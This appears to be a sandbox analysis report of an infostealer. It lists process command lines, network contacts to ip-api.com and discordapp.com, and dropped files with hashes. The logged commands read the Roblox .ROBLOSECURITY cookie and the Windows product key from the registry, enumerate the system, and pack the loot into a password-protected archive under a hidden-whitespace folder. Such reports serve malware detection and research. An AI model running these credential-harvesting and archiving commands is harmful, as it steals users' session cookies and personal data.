C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES734B.tmp" "c:\Users\Admin\AppData\Local\Temp\emviyuxo\CSC17AF24C7DE1D4780AB82FE22EAB521D.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe a -r -hp"Zachattack091010!" "C:\Users\Admin\AppData\Local\Temp\23Yox.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe a -r -hp"Zachattack091010!" "C:\Users\Admin\AppData\Local\Temp\23Yox.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
DE 142.250.186.99:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.130.233:443 discordapp.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI40922\python311.dll

MD5 76eb1ad615ba6600ce747bf1acde6679
SHA1 d3e1318077217372653be3947635b93df68156a4
SHA256 30be871735591ad96bc3fc7e541cdef474366159c2f7443feb30739cbd2db7e1
SHA512 2b960e74dd73f61d6a44fef0de9f2d50bcf2ec856b7aa5b97f0107e3cdadea461790760668a67db2ecaf71ff323133ee39ce2b38aafff3629c14e736d6a64aeb

C:\Users\Admin\AppData\Local\Temp\_MEI40922\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/3164-25-0x00007FFE10250000-0x00007FFE1083E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI40922\base_library.zip

MD5 81cd6d012885629791a9e3d9320c444e
SHA1 53268184fdbddf8909c349ed3c6701abe8884c31
SHA256 a18892e4f2f2ec0dee5714429f73a5add4e355d10a7ba51593afc730f77c51dd
SHA512 d5bf47fad8b1f5c7dcaa6bef5d4553e461f46e6c334b33d8adc93689cf89365c318f03e961a5d33994730b72dc8bde62209baca015d0d2d08a081d82df7dfd73

C:\Users\Admin\AppData\Local\Temp\_MEI40922\blank.aes

MD5 aa8030686d448b5a88f72b770c0f8c3a
SHA1 498f03e1dd788ff33cdd570eb00a85ee0e035bcd
SHA256 6a7c9ca577a6df02833911bea20dcec90e40f3dafaab330eff316cbfb4e24e8b
SHA512 f8eaf48d3919e85fd1eda64dc453c1fb1ea719a68e6b128ba19fe6ad74f123c7de8379a39d31cf67e25a45023716cd7e171933e0be1cd2a3a8d60f496f3e77af

C:\Users\Admin\AppData\Local\Temp\_MEI40922\libssl-3.dll

MD5 6eda5a055b164e5e798429dcd94f5b88
SHA1 2c5494379d1efe6b0a101801e09f10a7cb82dbe9
SHA256 377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8
SHA512 74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

memory/3164-47-0x00007FFE18D50000-0x00007FFE18D74000-memory.dmp

memory/3164-48-0x00007FFE1B030000-0x00007FFE1B03F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_ssl.pyd

MD5 936919f3509b2a913bf9e05723bc7cd2
SHA1 6bf9f1ecfcd71fc1634b2b70fcd567d220b1a6bd
SHA256 efce6dcf57915f23f10c75f6deaf6cb68efe87426caad4747ca908199b1f01e3
SHA512 2b2436e612b6cd60d794f843498fcbf8624a80e932d242592e569e32ec1d40a25d80e2c7e9f8edc7fc0478cef2ec6f77ad6c6ebbddf5afb027263397c91c73c3

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_sqlite3.pyd

MD5 c9d6ffa3798bb5ae9f1b082d66901350
SHA1 25724fecf4369447e77283ece810def499318086
SHA256 410dad8d8b4ccf6f22701a2cdcb1bb5fd10d8efa97a21b1f5c7e1b8afc9f4fec
SHA512 878b10771303cb885039348fc7549338ad2ce609f4df6fff6588b079ab9efb624d6bc31474e806ad2a97785b30877b8241286276f36aab9e50a92cbf11adc448

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_socket.pyd

MD5 3ea95c5c76ea27ca44b7a55f6cfdcf53
SHA1 aace156795cfb6f418b6a68a254bb4adfc2afc56
SHA256 7367f5046980d3a76a6ddefc866b203cbaced9bb17f40ea834aed60bb5b65923
SHA512 916effbe6130a7b6298e1bd62e1e83e9d3defc6a7454b9044d953761b38808140a764ded97dcb1ab9d0fa7f05ae08c707da7af1c15f672a959ad84aa8da114c0

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_queue.pyd

MD5 8b3ba5fb207d27eb3632486b936396a3
SHA1 5ad45b469041d88ec7fd277d84b1e2093ec7f93e
SHA256 9a1e7aaf48e313e55fc4817f1e7f0bfe0a985f30c024dcc8d28d67f8ff87a051
SHA512 18f5a0b1a384e328d07e59a5cefbc25e027adf24f336f5ec923e38064312ea259851167bc6bc0779e2d05cd39ddd8d16a2dfd15751c83ee58fda3b1187edc54b

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_lzma.pyd

MD5 5eee7d45b8d89c291965a153d86592ee
SHA1 93562dcdb10bd93433c7275d991681b299f45660
SHA256 7b5c5221d9db2e275671432f22e4dfca8fe8a07f6374fcfed15d9a3b2fdf07d9
SHA512 0d8f178ff5ef1e87aa4aae41089d063985c11544f85057e3860bcab1235f5ddb1cb582550a482c8b7eb961211fa67777e30b678294258ada27c423070ce8453e

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_hashlib.pyd

MD5 6d2132108825afd85763fc3b8f612b11
SHA1 af64b9b28b505e4eab1b8dd36f0ecf5511cc78a0
SHA256 aba69b3e817bfb164ffc7549c24b68addb1c9b88a970cf87bec99d856049ee52
SHA512 196bcf97034f1767a521d60423cca9d46a6447156f12f3eac5d1060a7fa26ac120c74c3ef1513e8750090d37531d014a48dd17db27fbfbb9c4768aa3aca6d5c0

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_decimal.pyd

MD5 918e513c376a52a1046c4d4aee87042d
SHA1 d54edc813f56c17700252f487ef978bde1e7f7e1
SHA256 f9570f5d214d13446ed47811c7674e1d77c955c60b9fc7247ebcb64a32ae6b29
SHA512 ac2990a644920f07e36e4cb7af81aab82a503e579ce02d5026931631388e2091a52c12e4417e8c747f2af9aa9526b441a3f842387b5be534633c2258beeed497

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_bz2.pyd

MD5 341a6188f375c6702de4f9d0e1de8c08
SHA1 204a508ca6a13eb030ed7953595e9b79b9b9ba3b
SHA256 7039e1f1aef638c8dd8f8a4c55fd337219a4005dca2b557ba040171c27b02a1e
SHA512 5976f053ff865313e3b37b58ca053bc2778df03b8488bb0d47b0e08e1e7ba77ccf731b44335df0cea7428b976768bedc58540e68b54066a48fc4d8042e1d8a24

C:\Users\Admin\AppData\Local\Temp\_MEI40922\unicodedata.pyd

MD5 6279c26d085d1b2efd53e9c3e74d0285
SHA1 bd0d274fb9502406b6b9a5756760b78919fa2518
SHA256 411bfb954b38ec4282d10cecb5115e29bffb0b0204ffe471a4b80777144b00f6
SHA512 30fdeed6380641fbb4d951d290a562c76dd44b59194e86f550a4a819f46a0deb7c7a2d94867cc367c41dcab9efb95628d65fe9a039c0e14a679c149148d82ac9

C:\Users\Admin\AppData\Local\Temp\_MEI40922\sqlite3.dll

MD5 cc9d1869f9305b5a695fc5e76bd57b72
SHA1 c6a28791035e7e10cfae0ab51e9a5a8328ea55c1
SHA256 31cb4332ed49ce9b31500725bc667c427a5f5a2a304595beca14902ba7b7eeee
SHA512 e6c96c7c7665711608a1ba6563b7b4adb71d0bf23326716e34979166de65bc2d93cb85d0cb76475d55fd042da97df978f1423c099ad5fbeeaef8c3d5e0eb7be1

C:\Users\Admin\AppData\Local\Temp\_MEI40922\select.pyd

MD5 2398a631bae547d1d33e91335e6d210b
SHA1 f1f10f901da76323d68a4c9b57f5edfd3baf30f5
SHA256 487fd8034efaf55106e9d04fc5d19fcd3e6449f45bc87a4f69189cd4ebb22435
SHA512 6568982977b8adb6ee04b777a976a2ecc3e4db1dffbd20004003a204eb5dae5980231c76c756d59a5309c2b1456cb63ab7671705a2c2e454c667642beb018c21

C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI40922\libcrypto-3.dll

MD5 27515b5bb912701abb4dfad186b1da1f
SHA1 3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411
SHA256 fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a
SHA512 087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

C:\Users\Admin\AppData\Local\Temp\_MEI40922\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI40922\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI40922\_ctypes.pyd

MD5 ee2d4cd284d6bad4f207195bf5de727f
SHA1 781344a403bbffa0afb080942cd9459d9b05a348
SHA256 2b5fe7c399441ac2125f50106bc92a2d8f5e2668886c6de79452b82595fc4009
SHA512 a6b3ad33f1900132b2b8ff5b638cbe7725666761fc90d7f76fc835ecd31dfefc48d781b12b1e60779191888931bb167330492599c5fea8afa51e9c0f3d6e8e55

memory/3164-54-0x00007FFE18D20000-0x00007FFE18D4D000-memory.dmp

memory/3164-57-0x00007FFE1AE40000-0x00007FFE1AE59000-memory.dmp

memory/3164-59-0x00007FFE18CF0000-0x00007FFE18D13000-memory.dmp

memory/3164-62-0x00007FFE18B70000-0x00007FFE18B89000-memory.dmp

memory/3164-70-0x00007FFE15A80000-0x00007FFE15B4D000-memory.dmp

memory/3164-69-0x00007FFE16190000-0x00007FFE161C3000-memory.dmp

memory/3164-71-0x00007FFE04410000-0x00007FFE04932000-memory.dmp

memory/3164-80-0x00007FFE15960000-0x00007FFE15A7C000-memory.dmp

memory/3164-78-0x00007FFE10250000-0x00007FFE1083E000-memory.dmp

memory/3164-81-0x00007FFE18CE0000-0x00007FFE18CED000-memory.dmp

memory/3164-79-0x00007FFE16170000-0x00007FFE16184000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j5p3ljf4.o30.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4148-90-0x0000020B41570000-0x0000020B41592000-memory.dmp

memory/4772-99-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/3164-72-0x000001B5325D0000-0x000001B532AF2000-memory.dmp

memory/4772-101-0x0000026ABEBF0000-0x0000026ABEC00000-memory.dmp

memory/4148-110-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/3164-64-0x00007FFE1B020000-0x00007FFE1B02D000-memory.dmp

memory/4616-111-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/3164-60-0x00007FFE15E30000-0x00007FFE15FA6000-memory.dmp

memory/4148-112-0x0000020B41400000-0x0000020B41410000-memory.dmp

memory/4616-115-0x0000015F6B390000-0x0000015F6B3A0000-memory.dmp

memory/3164-116-0x00007FFE18D50000-0x00007FFE18D74000-memory.dmp

memory/4772-114-0x0000026ABEBF0000-0x0000026ABEC00000-memory.dmp

memory/4616-113-0x0000015F6B390000-0x0000015F6B3A0000-memory.dmp

memory/3164-118-0x00007FFE18CF0000-0x00007FFE18D13000-memory.dmp

memory/1416-120-0x000001AC25DE0000-0x000001AC25DF0000-memory.dmp

memory/1416-121-0x000001AC25DE0000-0x000001AC25DF0000-memory.dmp

memory/3164-122-0x00007FFE18B70000-0x00007FFE18B89000-memory.dmp

memory/4616-119-0x0000015F6B390000-0x0000015F6B3A0000-memory.dmp

memory/4772-117-0x0000026ABEBF0000-0x0000026ABEC00000-memory.dmp

memory/1416-123-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4148-124-0x0000020B41400000-0x0000020B41410000-memory.dmp

memory/3164-125-0x000001B5325D0000-0x000001B532AF2000-memory.dmp

memory/2704-134-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/3164-135-0x00007FFE16190000-0x00007FFE161C3000-memory.dmp

memory/3164-136-0x00007FFE15A80000-0x00007FFE15B4D000-memory.dmp

memory/3164-145-0x00007FFE04410000-0x00007FFE04932000-memory.dmp

memory/4616-147-0x0000015F6B390000-0x0000015F6B3A0000-memory.dmp

memory/4772-146-0x0000026ABEBF0000-0x0000026ABEC00000-memory.dmp

memory/4772-148-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4772-150-0x0000026ABEBF0000-0x0000026ABEC00000-memory.dmp

memory/1416-149-0x000001AC25DE0000-0x000001AC25DF0000-memory.dmp

memory/4148-151-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4616-152-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4772-155-0x0000026ABEBF0000-0x0000026ABEC00000-memory.dmp

memory/4616-156-0x0000015F6B390000-0x0000015F6B3A0000-memory.dmp

memory/4616-154-0x0000015F6B390000-0x0000015F6B3A0000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\emviyuxo\emviyuxo.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\emviyuxo\emviyuxo.cmdline

MD5 ef5af4133522b458cf7f31957fc2098c
SHA1 c75f88e0328f78400e8dacd88a4a9775a17301d0
SHA256 d14c19f416ce97a215fec10158853dfac6432c242351a5adf7384fcf9a242653
SHA512 98ccdb834caec76cc1b8943fd8e2814f44b332b487b02c4c81ac96c8c3c76594163032485e291c1faeb0e9061f287346da69663fa4b77e7b58c79cbc5a8a9fdf

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

memory/2704-175-0x000001A86B7A0000-0x000001A86B7A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\emviyuxo\emviyuxo.dll

MD5 3ce93bae2b317f02fea9067474f322b2
SHA1 2c9db780d8093bb75b577a0d4d0d360353579058
SHA256 b461f6baa5f9c06c284fa80e1be75130a07efe8f0d6e530abe81da6fb38e39be
SHA512 041bac05ac17e63b12b2951174982abf6b77b8ec64cd8cfeff77487ad77fc630efc0c96efc8aa9959960e660a3e0dd73c3bb94c011e65ea011903d9f14d8d0ec

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 74e4a39ae145a98de20041613220dfed
SHA1 ac5dd2331ae591d7d361e8947e1a8fba2c6bea12
SHA256 2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36
SHA512 96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 408641808e457ab6e23d62e59b767753
SHA1 4205cfa0dfdfee6be08e8c0041d951dcec1d3946
SHA256 3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258
SHA512 e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb

memory/4616-196-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa4f31835d07347297d35862c9045f4a
SHA1 83e728008935d30f98e5480fba4fbccf10cefb05
SHA256 99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0
SHA512 ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

memory/2704-193-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4772-192-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9fe4cd5675481c6c8c97e2f2e9c76c96
SHA1 b97159260e37b3fa7e89852d825d8cf0583258ee
SHA256 70403ccad41d73af48ab5773271d833c64dd42e97279c281e2ef76bdbd3c6f51
SHA512 8eeab245b6e6e43347d1db6afda002afded1d419dd440823efc44375ba24817d27323c21fe33c2bda4dbd414748cd4071759651c469b6b6691117fec9835e1ac

memory/4264-241-0x00000224C1180000-0x00000224C1190000-memory.dmp

memory/4264-240-0x00000224C1180000-0x00000224C1190000-memory.dmp

memory/4264-239-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4148-189-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RES734B.tmp

MD5 95b8bb6fb4c55f85ad69465f400ef02c
SHA1 22e72292845dbaaf9531929e848fbaf7e4ba54fa
SHA256 ea30690e49091432dcdf9b4dcc698856128e543bddf2724532bd05a46e36e90d
SHA512 cf1112096fbb0801b0d870635e2c747afe3104fa1adb59861439c9e281c34feec85d28adc6bf1e26085fef10710207c9413fc494d1145e412b818b7c3368c224

\??\c:\Users\Admin\AppData\Local\Temp\emviyuxo\CSC17AF24C7DE1D4780AB82FE22EAB521D.TMP

MD5 0a7051f544c3ffde73c1ed0ab357be32
SHA1 caff3f010332347dc9bf93b97353e62528fddf56
SHA256 ee18153b8da31f8b11aefbcd520bb14351f5144f361914405d88bcfea6e7032a
SHA512 b1996462c89001a41eeb60fde70f7650f8ca6ee3bdad285c0400bf75238454ff534c5d0d9cd3d7be5b7b4808d961f9e0a187f32e79b20e3a0660e58627822475

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a873c13ffa169a1e672aa991ca72aeb3
SHA1 0e1e8e91738e70980ca646b91de79bb2dd0c7763
SHA256 bec3e737e684740ff59eb220c95d1cad5ba00ec305066bdb86665edbf0bdb2f5
SHA512 49d0cbedd336ae1438b43b0717b46df2af25936b5ac4a95abda02c47f7391301fe0c4d365e0e313434124d31924909db79ccad00b528210bdcc89ee96c6d9b3f

memory/864-252-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/4264-243-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/864-255-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

memory/1416-167-0x00007FFE03940000-0x00007FFE04402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Directories\Videos.txt

MD5 e140e10b2b43ba6f978bee0aa90afaf7
SHA1 bbbeb7097ffa9c2daa3206b3f212d3614749c620
SHA256 c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618
SHA512 df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0985ae117be8f70f56eb1635dda6971b
SHA1 a2030a3a416bae7ee3bb3be008655d0888572bfb
SHA256 bf51791875c3197972053173cad6bb2f836e1e786f338149836c5b58f413f934
SHA512 83afc1f898c90d4277c7115fa10b5316d4998180e723d2c8e8308edd79ee0e1b9b3142a4570f603b176d8392711d248da83baeffd583d7ada6f67f8c082a192b

C:\Users\Admin\AppData\Local\Temp\23Yox.zip

MD5 e4884a81fcec8733659071ac829db9ec
SHA1 3813e969372d7a40480ace6037d1109b90dda300
SHA256 011f127c82451470f373f7902088d1a27308d0cb3578033cc4bfd927262b755c
SHA512 ce5ba0792b6063abbb86feda819ee94653b7d7c18533fa6cf50ef495a5f80e48b9b4361a46f57cea30dbb4c71d4ff01bf419d81e6ae9ed1db363ed4f799fbaae

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \System\Task List.txt

MD5 7a839443fe72160e7b5b2b9ec4b5f8c4
SHA1 e41c194a07d1fa43853ad002a98ca0a0c9afdc56
SHA256 44b7a322ff3d5b52e842395b9e3f8c2ad73166d00361e67c2a3b81f134b7b623
SHA512 e43f5110634837b8fb6223016ca1fc603abfcf82db5f28f51b5b3660b71b15253c8d011dcfea11f92382e32bfa007c91f7097393ccc190d78f5cedb09e979c9a

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \System\System Info.txt

MD5 ccf31995e8c2c3bf378b858816ba91e7
SHA1 e6d8321a903761e7e8bdaf3674cb284f238c6697
SHA256 aa1cec4b0d9c5379b002c03ecb4d99e535feb656d5e6d95d2d03358a06f97e35
SHA512 7ebfa41781637dbe0a3e0c053c8be15c0f3d9d48cb430eec16bf976a58263ac7806e9134b1bd8eed67a61dc50fdc2cf894fc56bf9dd88acda7d24b5679a6b3a6

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \System\MAC Addresses.txt

MD5 b197e319a2b2ee2bf40f2d2b847ef931
SHA1 c350e85706b6e404e186f03d985dd4ea1cfa341b
SHA256 9f858c1d34d9c93c6d55cb34ebbe6403ce18563b4c9a4659c37878f7bff9685d
SHA512 e02498486e8bdab5ef626cf6f643b29cd8928e7fffaa325cacb7e1cd14a9a777751556782d1a8d239ce1ea6516e13e261c4917ab982c545066a93dbf28e2969a

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Display (1).png

MD5 e7c53515b9bc4aba7d3e9a506093b275
SHA1 2a2faa43595922abd452ff303b2fd70f4d0f3737
SHA256 472acf99369eefb8b89584d00c2f0aef162746785824d9b311e069facb48b182
SHA512 234a4f71013b384d091ca4ff0645732c201fdd34495f10bd493b1e8051e0d75b8dd9449c28c4e8ed3a7618204d152818a261ca032125b4b992d69a09d2a91557

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Directories\Pictures.txt

MD5 72ab7c99ecd2e90ebbaa11cbef60449c
SHA1 9934079ce8236b765e174de2dd0f01438c5348ae
SHA256 407ff70da7a1b1c86f91a3032b6cf613daaf6dca8824ce87a814f66a6c45a989
SHA512 e908e572ce519afd2a30480ed52bc25bb664bc24aaab26c3962d5bcacde10352b4911c248a22e361a22f9ef78958e8e249783be8f1a2cc4aa4bbf82379c3d244

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Directories\Music.txt

MD5 ba465c66e857ceb29aa1d864c8701178
SHA1 e35c4c575c85ced705ad16e7a4b4bc200eba3be9
SHA256 20ae35ae6f3b6066a7b76546e0e2a721b7450146446c660efd0ea8e176b84c3e
SHA512 e74ebbb14effb29482ed8d54ff7303a2d0db5a770620bc061070086cf8b7ac7a2e6b9ceee8da7a442034befe0f71fe4ae2377a432698d144c3154d082c377546

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Directories\Downloads.txt

MD5 aac1fb5b14593bdfb12858ed579db4f0
SHA1 43d48ec7eb0351ed823f47fd8224a00c345c6190
SHA256 36b95c52baef48e6388e17508d1a374b95c894d48b897b2b865a0371d9043a0b
SHA512 51d7af8f30d094657b19765cee1f63b52ef5105ab9b54ba74ed52211e2d66b0a47657f6837fcf4e5d6962d1283fe39341ee5fb940e7f8df80a025195a96c8db4

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Directories\Documents.txt

MD5 9afd755aaf71fb244aa2bf2181422dcd
SHA1 c5c08feff2bf4aa1858a24b90314ad5afd476114
SHA256 1af6e8eda59abe6f4c4bb6fcb6cc0583f8037caba39d92d5788c179b648af05f
SHA512 bc2d9c8e095f8fd9eadd5c42f56ec14e1cdfc764c511fb28c0aea8c3320c71446ca56d866a09c7dce4504706100331a4a659468f35dfcc02e327a98eb2dcfb49

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Directories\Desktop.txt

MD5 47f76b064d5686a717db7f2daf6b462e
SHA1 e58056959320a4a9ea95d1cd6d56684ad5536ff7
SHA256 0652a07eefb66b4532d6e937d186d2ccb07db77cbd1539b729306ea4662c3eaa
SHA512 f631ec20826ca56f8fdce209bf40deb786ba7fe027f32a9ecc01477d783db3e211b38b79564734d57fd3a364bc541ab0fa134e4feccbd92ce3c76de74ce25fcf

memory/2704-157-0x000001A86B590000-0x000001A86B5A0000-memory.dmp

